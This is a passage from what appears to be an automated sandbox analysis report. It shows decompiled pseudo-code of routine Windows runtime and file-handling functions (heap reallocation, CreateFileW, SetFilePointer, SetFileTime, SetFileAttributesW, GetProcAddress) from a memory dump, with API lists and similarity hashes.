				_t70 = E001B7A8A(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E001BA873(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E001B7847();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x1cdb20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0x1cdb20) {
								E001B7A50( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x1cdda0 & 0x00000001;
							if(( *0x1cdda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E001BA31C(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0x1cdd40; // 0xf32588
									 *0x1cd814 = _t44;
								}
							}
						}
						L6:
						E001B7A50(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E001B7ECC())) = 0x16;
						goto L5;
					}
				}
			}

0x001ba6b2
0x001ba6bf
0x001ba6c2
0x001ba6ca
0x001ba6d3
0x001ba6d6
0x001ba6dc
0x00000000
0x001ba6de
0x001ba6e2
0x001ba6ef
0x001ba6f1
0x001ba6f5
0x001ba6f7
0x001ba727
0x001ba727
0x00000000
0x001ba6f9
0x001ba706
0x001ba70c
0x001ba70f
0x001ba714
0x001ba718
0x001ba71a
0x001ba739
0x001ba73d
0x001ba73f
0x001ba73f
0x001ba74a
0x001ba74e
0x001ba74f
0x001ba751
0x001ba754
0x001ba75b
0x001ba760
0x001ba765
0x001ba75b
0x001ba766
0x001ba76c
0x001ba771
0x001ba773
0x001ba776
0x001ba779
0x001ba780
0x001ba782
0x001ba789
0x001ba78e
0x001ba797
0x001ba79c
0x001ba7a2
0x001ba7a4
0x001ba7a9
0x001ba7a9
0x001ba7a2
0x001ba789
0x001ba729
0x001ba72a
0x00000000
0x001ba71c
0x001ba721
0x00000000
0x001ba721
0x001ba71a

APIs

Part of subcall function 001B8516: GetLastError.KERNEL32(?,001D00E0,001B3394,001D00E0,?,?,001B2E0F,?,?,001D00E0), ref: 001B851A
Part of subcall function 001B8516: _free.LIBCMT ref: 001B854D
Part of subcall function 001B8516: SetLastError.KERNEL32(00000000,?,001D00E0), ref: 001B858E
Part of subcall function 001B8516: _abort.LIBCMT ref: 001B8594

Part of subcall function 001BA7D1: _abort.LIBCMT ref: 001BA803
Part of subcall function 001BA7D1: _free.LIBCMT ref: 001BA837

Part of subcall function 001BA446: GetOEMCP.KERNEL32(00000000,?,?,001BA6CF,?), ref: 001BA471

_free.LIBCMT ref: 001BA72A
_free.LIBCMT ref: 001BA760

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: b01f57dc49c910ce2868ef7dd99d5f3492a148eb18bc98c24a6a664472cdcacb
Instruction ID: f6de15c0362724cba3063b8e1cfbe923a5252b1b806fb924c9eb40bc5051beb6
Opcode Fuzzy Hash: b01f57dc49c910ce2868ef7dd99d5f3492a148eb18bc98c24a6a664472cdcacb
Instruction Fuzzy Hash: C931D931908208AFDB10EFA9D541BEDBBF4EF51360F654099E4049B2A1EF729E41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00199528, Relevance: 3.1, APIs: 2, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00199528(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E001AD940();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x18) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E0019B927(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E0019B32C(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x12)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E0019FAB1(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}

0x0019952d
0x00199533
0x00199540
0x00199542
0x00199548
0x00199556
0x00199556
0x00199550
0x00199550
0x00199550
0x00199560
0x00199575
0x0019957e
0x00199584
0x0019958e
0x00000000
0x00199590
0x00199590
0x00199594
0x00199596
0x00199596
0x0019959c
0x0019959c
0x0019959c
0x001995a0
0x001995a0
0x001995b0
0x001995b6
0x001995b6
0x001995bd
0x001995eb
0x001995eb
0x001995fd
0x00199602
0x00199605
0x0019961e

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00199BF3,?,?,001976AC), ref: 001995B0
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00199BF3,?,?,001976AC), ref: 001995E5

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e4be073c92dbe0f051661feb4aad2ce1fde4de9abf602fe2c7a2f12204245b61
Instruction ID: 86a2fe7ebd26642bb7c8d0a5954ff53bf7625e864f4502da2716befebdb88e69
Opcode Fuzzy Hash: e4be073c92dbe0f051661feb4aad2ce1fde4de9abf602fe2c7a2f12204245b61
Instruction Fuzzy Hash: 5721F3B1004748AFEB318F68C885BA77BE8EB59364F01492EF5D5C21D2C375AD89CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00199A7E, Relevance: 3.1, APIs: 2, Instructions: 82
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00199A7E(void* __ecx, void* __esi, signed char _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_a4 = 0;
				} else {
					_a4 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E001A082F(_t51, _t57,  &_v24);
				}
				if(_a4 != 0) {
					E001A082F(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E001A082F(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_a4 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}

0x00199a7e
0x00199a84
0x00199a8d
0x00199a98
0x00199a98
0x00199a9e
0x00199aa4
0x00199aa7
0x00199ab4
0x00199ab0
0x00199ab0
0x00199ab0
0x00199ab6
0x00199ab7
0x00199abb
0x00199ac1
0x00199ace
0x00199ace
0x00199ac3
0x00199ac8
0x00199acc
0x00000000
0x00000000
0x00199acc
0x00199ad3
0x00199ad9
0x00199ae3
0x00199ae3
0x00199ae7
0x00199aee
0x00199aee
0x00199af8
0x00199b01
0x00199b01
0x00199b09
0x00199b12
0x00199b12
0x00199b22
0x00199b30
0x00199b40
0x00199b48
0x00199b54

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,0019738C,?,?,?), ref: 00199A98
SetFileTime.KERNELBASE(?,?,?,?), ref: 00199B48

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: c87925961a578212146ee4430ecc89448ecec62d269fcdb5d40258bcdd107c19
Instruction ID: 41eeeefbee3c894b7bde99700138f839a58f134d3c1265166d3b020392ac2982
Opcode Fuzzy Hash: c87925961a578212146ee4430ecc89448ecec62d269fcdb5d40258bcdd107c19
Instruction Fuzzy Hash: 6721D131648386AFCB11DE28C891AABBBE8EF65304F08091DB881C7151D739ED08CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001B9990, Relevance: 3.1, APIs: 2, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E001B9990(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0x1f07b8 + _a4 * 4;
				_t27 =  *0x1cd668; // 0x44aa1787
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0x1cd668; // 0x44aa1787
							goto L13;
						}
						 *_t20 = E001ADB10(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E001B9A2C( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0x1cd668; // 0x44aa1787
						goto L7;
					}
					_t27 =  *0x1cd668; // 0x44aa1787
					goto L8;
				}
				L2:
				return _t33;
			}

0x001b999b
0x001b99a4
0x001b99aa
0x001b99b4
0x001b99b6
0x001b99ba
0x001b9a25
0x00000000
0x001b9a25
0x001b99be
0x001b99c4
0x001b99ca
0x001b99e6
0x001b99e6
0x001b99e8
0x001b99ea
0x001b9a15
0x001b9a17
0x001b9a1f
0x001b9a23
0x00000000
0x001b9a23
0x001b99f6
0x001b99fa
0x001b9a0f
0x00000000
0x001b9a0f
0x001b9a03
0x00000000
0x00000000
0x00000000
0x00000000
0x001b99cc
0x001b99cc
0x001b99ce
0x001b99d6
0x00000000
0x00000000
0x001b99d8
0x001b99de
0x00000000
0x00000000
0x001b99e0
0x00000000
0x001b99e0
0x001b9a07
0x00000000
0x001b9a07
0x001b99c0
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 001B99F0
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 001B99FD

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 49fe923d559061ede9924c722f74916c182a9d7567277d98bcaa17cd393cc2b2
Instruction ID: 64af38e3ec1a4905c23d8a519206e112400e6c3ee277f42cf9acef2e7fb4101e
Opcode Fuzzy Hash: 49fe923d559061ede9924c722f74916c182a9d7567277d98bcaa17cd393cc2b2
Instruction Fuzzy Hash: 0F110633A006319B9F25DE39EC40DEAB7A5AB853647164260FE18AB694D730EC43C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 00199B57, Relevance: 3.1, APIs: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00199B57() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x14)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E00196DE2(0x1d00e0, 0x1d00e0, _t34 + 0x1e);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x14)) == 0) {
					return _t22;
				}
				E00196DE2(0x1d00e0, 0x1d00e0, _t34 + 0x1e);
				goto L3;
			}

0x00199b5b
0x00199b5d
0x00199b68
0x00199b7b
0x00199b7b
0x00199b8d
0x00199b93
0x00199b97
0x00199bb4
0x00199bba
0x00199bbf
0x00199bc1
0x00000000
0x00199ba3
0x00199ba7
0x00199bd0
0x00199bc4
0x00000000
0x00199bc4
0x00199baf
0x00000000
0x00199baf
0x00199b97
0x00199b6e
0x00000000
0x00199bcc
0x00199b76
0x00000000

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00199B8D
GetLastError.KERNEL32 ref: 00199B99

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: c75961b3f45a76b50028e8244023b15d9beaff860a80a8935b7323bdbc2d3a4b
Instruction ID: 6563b1c6ea3cdfd54fc4b2c298bd1b6297d231bc5951c33f40c80afe4cfe4ed3
Opcode Fuzzy Hash: c75961b3f45a76b50028e8244023b15d9beaff860a80a8935b7323bdbc2d3a4b
Instruction Fuzzy Hash: 9B0152717012406BDB349E2DEC84F6AB6DAAB85315F14453EF193C26C0DB79DC48C621

Uniqueness

Uniqueness Score: -1.00%

Function 00199903, Relevance: 3.1, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00199903(intOrPtr* __ecx, long _a4, long _a8, long _a12) {
				long _t14;
				void* _t17;
				intOrPtr* _t19;
				long _t21;
				void* _t23;
				long _t25;
				long _t28;
				long _t31;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
					L13:
					return 1;
				}
				_t28 = _a4;
				_t25 = _a8;
				_t31 = _t25;
				if(_t31 > 0 || _t31 >= 0 && _t28 >= 0) {
					_t21 = _a12;
				} else {
					_t21 = _a12;
					if(_t21 != 0) {
						if(_t21 != 1) {
							_t17 = E001996E1(_t23);
						} else {
							_t17 =  *((intOrPtr*)( *_t19 + 0x14))();
						}
						_t28 = _t28 + _t17;
						asm("adc edi, edx");
						_t21 = 0;
					}
				}
				_a12 = _t25;
				_t14 = SetFilePointer( *(_t19 + 4), _t28,  &_a12, _t21); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}

0x00199907
0x0019990d
0x00199972
0x00000000
0x00199972
0x00199910
0x00199914
0x00199917
0x00199919
0x00199943
0x00199921
0x00199921
0x00199926
0x0019992d
0x00199936
0x0019992f
0x00199931
0x00199931
0x0019993b
0x0019993d
0x0019993f
0x0019993f
0x00199926
0x00199948
0x00199957
0x00199962
0x00000000
0x0019996e
0x00000000
0x0019996e

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 00199957
GetLastError.KERNEL32 ref: 00199964

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 1114255e593d02e8e9f7f51a1411db087ac5815918ada887e1b157595bbf9c59
Instruction ID: 44eee8d2146edbc136cd9eaff485026ec8a4c9dd6d337b8d2a2fb73715a56421
Opcode Fuzzy Hash: 1114255e593d02e8e9f7f51a1411db087ac5815918ada887e1b157595bbf9c59
Instruction Fuzzy Hash: 9C01F2322012119B8F1C8E6E8C85ABF7769BF51738709422EFD27CB291DB30EC51D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 001B7B78, Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E001B7B78(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0x1f0874, 0, _t14, _t16); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E001B7906();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E001B6763(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E001B7ECC())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E001B7A50(_t14);
					goto L6;
				}
				_t9 = E001B7A8A(__ecx, _a8); // executed
				return _t9;
			}

0x001b7b78
0x001b7b78
0x001b7b7e
0x001b7b83
0x001b7b91
0x001b7b94
0x001b7b96
0x001b7ba1
0x001b7ba4
0x001b7bcb
0x001b7bd5
0x001b7bdb
0x001b7bdd
0x00000000
0x00000000
0x001b7bbc
0x001b7bbe
0x00000000
0x00000000
0x001b7bc1
0x001b7bc6
0x001b7bc7
0x001b7bc9
0x00000000
0x00000000
0x001b7bc9
0x001b7bb3
0x00000000
0x001b7bb3
0x001b7ba6
0x001b7bab
0x001b7bb1
0x001b7bb1
0x001b7bb1
0x00000000
0x001b7bb1
0x001b7b99
0x00000000
0x001b7b9e
0x001b7b88
0x00000000

APIs

_free.LIBCMT ref: 001B7B99

Part of subcall function 001B7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,001B2FA6,?,0000015D,?,?,?,?,001B4482,000000FF,00000000,?,?), ref: 001B7ABC

RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,001D00E0,0019CB18,?,?,?,?,?,?), ref: 001B7BD5

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: 4493d65efd2a9d07758bb9e90415c2b54d91430daa016b9f9c87062229163614
Instruction ID: f3bc3b1ab2b75cfd0f4beaaef4a2586f7d95ff6151c301aab0e5890c6dd54838
Opcode Fuzzy Hash: 4493d65efd2a9d07758bb9e90415c2b54d91430daa016b9f9c87062229163614
Instruction Fuzzy Hash: FDF06D3260C1156ADB363A369E41FEF3769DFE1BB1B15015AFC19AA2D0DF30DC4099A1

Uniqueness

Uniqueness Score: -1.00%

Function 001A0574, Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001A0574(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}

0x001a0588
0x001a0590
0x00000000
0x001a0592
0x001a0597
0x001a059b
0x001a059e
0x001a05a0
0x001a05a2
0x001a05a4
0x001a05a4
0x001a05a5
0x001a05a5
0x001a05ac
0x00000000
0x001a05ae
0x001a05b3

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 001A0581
GetProcessAffinityMask.KERNEL32 ref: 001A0588

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 0f6e359559215ef0f2428ef856f970c1420b0dd0e2795e221078760ad3a4d7af
Instruction ID: feb3b7e89766ea0a9a5ee4fd834eedeb80612f09cc1319004ee92ef99f12cc24
Opcode Fuzzy Hash: 0f6e359559215ef0f2428ef856f970c1420b0dd0e2795e221078760ad3a4d7af
Instruction Fuzzy Hash: 40E09B76E10305AB5F1A86A49C058BB77DDD74E301B10517AF902D3700FB34DD414FA4

Uniqueness

Uniqueness Score: -1.00%

Function 0019A12F, Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0019A12F(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E001AD940();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E0019B32C(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}

0x0019a137
0x0019a13c
0x0019a143
0x0019a14b
0x0019a150
0x0019a17c
0x0019a17c
0x0019a185

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00199F65,?,?,?,00199DFE,?,00000001,00000000,?,?), ref: 0019A143
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00199F65,?,?,?,00199DFE,?,00000001,00000000,?,?), ref: 0019A174

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 332ae7ab56d7b9467b3b81e252e1e37ee1bc89cb72d6e24acc0513d13e52849c
Instruction ID: 5c65d3ba907d3dca08a0e0ba18588549917d946f437c8faf7df6ca8841305679
Opcode Fuzzy Hash: 332ae7ab56d7b9467b3b81e252e1e37ee1bc89cb72d6e24acc0513d13e52849c
Instruction Fuzzy Hash: 2FF03031140109ABDF015F60DC41FEA7B6CBF14381F848061BC8C96165DB72D9E9EA90

Uniqueness

Uniqueness Score: -1.00%

Function 001ACB57, Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 001ACB85
SetDlgItemTextW.USER32(00000065,?), ref: 001ACB9C

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: e9ac78d6c3c3a7c66fa54cb7af0a61b2e7a77494f1cedfcc018e9e1cd1c10963
Instruction ID: 9a31775ebad9844d301ce1169bea9190b3b0a6fe98e91c66fb7bc6cc3e7d23f2
